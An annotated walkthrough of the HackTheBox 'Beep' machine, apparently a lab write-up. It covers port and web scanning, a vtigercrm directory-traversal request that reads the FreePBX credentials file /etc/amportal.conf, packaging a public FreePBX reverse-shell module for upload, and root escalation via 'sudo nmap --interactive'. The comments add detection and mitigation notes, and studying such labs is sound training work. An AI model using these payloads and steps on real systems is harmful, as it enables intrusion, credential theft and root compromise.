# Map the lab hostname beep.htb to the target address by appending one line
# to /etc/hosts. tee runs under sudo because a plain ">>" redirect would be
# performed by the unprivileged shell; -a appends rather than truncating.
# Re-running this adds a duplicate entry each time.
echo "10.129.1.226 beep.htb" | sudo tee -a /etc/hosts

# Three port/service scans of the same host, from broadest to most specific.
# From the defender's side all three are loud: a single source touching every
# TCP port and running NSE checks stands out in firewall and IDS logs.

# Full-range scan: -A enables OS detection, version detection, default
# scripts and traceroute; -p- covers ports 1-65535; --script=vuln adds the
# NSE "vuln" category; --script-timeout=15 caps each script at 15 seconds.
# --min-rate=10000 forces at least 10000 packets/second, which trades
# accuracy for speed and can miss open ports on a slow link.
# -oA output writes output.nmap / output.gnmap / output.xml.
nmap -A -p- -oA output 10.129.1.226 --min-rate=10000 --script=vuln --script-timeout=15 -v

# Default port set with the -T4 timing template and the "vuln" scripts.
# NOTE(review): this reuses the basename "output", so it overwrites the
# result files written by the previous command.
nmap -T4 -oA output 10.129.1.226 --script=vuln -v

# TCP connect scan (-sT) of all ports with version detection (-sV) and the
# default script set (-sC); -Pn skips host discovery and treats the host as
# up. No -o option is given, so results go to the terminal only.
nmap -sT -sV -sC -Pn -p- 10.129.1.226

# Web enumeration against the plain-HTTP port. Both tools issue a large
# number of requests in a short time; in web access logs this shows up as a
# burst of 404 responses from one client, and by default each tool sends a
# recognisable User-Agent string.

# Nikto: checks the web server at host:port for known files and
# misconfigurations.
nikto -h 10.129.1.226:80

# Gobuster in directory mode: requests every entry of the dirb "big"
# wordlist under the base URL, using 20 concurrent threads (-t 20).
gobuster dir -u http://10.129.1.226 -w /usr/share/dirb/wordlists/big.txt -t 20

Pasted image 20210304221027.png

# Request to vtigercrm/graph.php in which the current_language parameter
# carries directory-traversal sequences followed by an absolute path
# (/etc/amportal.conf) and a URL-encoded NUL byte (%00). The response shown
# in the screenshot on the page is the content of that file, i.e. the
# parameter is used to build an include/read path without validation.
# amportal.conf is the FreePBX/Asterisk portal configuration and normally
# holds service credentials, so any password in it should be treated as
# exposed and rotated.
# -k turns off TLS certificate verification; it has no effect on this
# http:// URL (the browser form of the same request on the page uses https).
# Detection: "../" runs or "%00" inside a query-string value in the web
# access log. Mitigation: upgrade the CRM, and restrict current_language to
# an allow-list of known language names instead of a file path.
curl -k "http://beep.htb/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action"

https://10.129.1.226/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

Pasted image 20210304221045.png

https://github.com/SamSepiolProxy/FreePBX-Reverse-Shell-Module

Pasted image 20210304221111.png

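# Fetch the module source linked on the page and package it for the FreePBX
# module-upload form shown in the screenshots.
# The original line had a shell prompt fragment ("130 ⨯") fused between the
# clone and the cd, which passed "130", "⨯", "cd" and the directory name to
# git clone as extra arguments; they are two separate commands.
git clone https://github.com/SamSepiolProxy/FreePBX-Reverse-Shell-Module
cd FreePBX-Reverse-Shell-Module

# install.php is edited by hand here; the page does not show the change.
vim shell/install.php

# Pack the shell/ directory as a gzip-compressed tarball (-c create,
# -z gzip, -v list files, -f archive name).
# Defender note: a module archive uploaded through the admin interface has
# its install.php executed by the PBX, so access to module administration
# is equivalent to code execution as the web/asterisk user. Restrict that
# interface and keep module signature checking enabled where available.
tar -cvzf shell-1.0.tar.gz shell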

Pasted image 20210304221137.png

Pasted image 20210304221145.png

Pasted image 20210304221153.png

Click on process and then confirm

Pasted image 20210304221111.png

Pasted image 20210304221221.png

Pasted image 20210304221229.png

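The sudo -l output (see the screenshot below) lists what this account may run as root; the next step relies on nmap being in that list, since nmap's legacy interactive mode can start a shell. Removing such entries from sudoers closes this path.

sh-3.2$ sudo -l
sh-3.2$ sudo nmap --interactive
nmap> !sh
python -c "import pty; pty.spawn('/bin/bash')"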

Pasted image 20210304221247.png
